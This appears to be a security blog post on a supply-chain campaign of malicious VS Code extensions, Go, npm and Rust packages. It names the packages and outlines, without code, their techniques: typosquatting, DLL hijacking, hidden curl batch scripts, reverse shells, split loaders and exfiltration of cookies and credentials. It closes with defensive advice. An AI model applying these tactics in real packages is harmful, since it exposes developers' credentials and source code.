Malicious Developer Ecosystem Packages Found (VS Code, Go, npm, Rust)

December 9, 2025 Faeem BLOGS 0

Cybersecurity researchers have uncovered malicious packages across multiple developer ecosystems — VS Code extensions, Go libraries, npm modules, and Rust crates — all designed to steal sensitive developer data and exfiltrate it to attacker-controlled servers.

Malicious VS Code Extensions

  • BigBlack.bitcoin-black (16 installs)
  • BigBlack.codo-ai (25 installs)
  • BigBlack.mrbigblacktheme (removed by Microsoft)

Behavior:

  • Masquerade as a dark theme or AI coding assistant.
  • Download additional payloads, take screenshots, siphon clipboard data, WiFi passwords, and browser sessions.
  • Use DLL hijacking via Lightshot binary (Lightshot.dll) to gather:
    • Installed apps & running processes
    • Desktop screenshots
    • Stored Wi-Fi credentials
    • Chrome/Edge cookies (via headless mode)

Evolution:

  • Early versions → visible PowerShell window (alerted users).
  • Later versions → hidden batch script using curl for stealthy payload delivery.

Malicious Go Packages

  • github[.]com/bpoorman/uuid
  • github[.]com/bpoorman/uid

Technique:

  • Typosquat trusted libraries (google/uuid, pborman/uuid).
  • Exfiltrate data to dpaste when developers invoke a fake helper function valid().

Malicious npm Packages

  • 420+ packages published by a likely French-speaking actor.
  • Naming pattern: elf-stats-*.

Capabilities:

  • Reverse shell execution.
  • File exfiltration to Pipedream endpoints.

Malicious Rust Crate

  • finch-rust (published by “faceless”).
  • Impersonates legitimate bioinformatics tool finch.

Loader behavior:

  • Contains mostly legitimate code.
  • Hidden malicious line loads sha-rust payload → credential stealer.
  • Separation of concerns makes detection harder (benign-looking loader, malicious secondary package).

Why This Matters

  • Developers are prime targets: attackers gain access to source code, credentials, and collaboration tools (Slack, email).
  • Supply chain risk: malicious packages infiltrate trusted ecosystems (VS Code Marketplace, npm, Go, Rust).
  • Stealth tactics: DLL hijacking, typosquatting, hidden batch scripts, and modular loaders complicate detection.

Defensive Recommendations

  • Audit dependencies: Check for suspicious packages (BigBlack.*, elf-stats-*, bpoorman/*, finch-rust).
  • Use trusted sources: Verify publishers and package signatures.
  • Monitor developer endpoints: Look for abnormal PowerShell, curl, or headless browser activity.
  • Educate developers: Warn against installing unverified extensions or libraries.
  • Implement supply chain security tools: Use scanners (e.g., Socket, Snyk) to detect malicious or typosquatted packages.

Final Thought

This campaign shows how attackers are weaponizing developer ecosystems to gain access to sensitive data and credentials. Even seemingly harmless tools — a theme, an AI assistant, or a helper library — can be Trojan horses.

Be the first to comment

Leave a Reply

Your email address will not be published.


*


This site uses Akismet to reduce spam. Learn how your comment data is processed.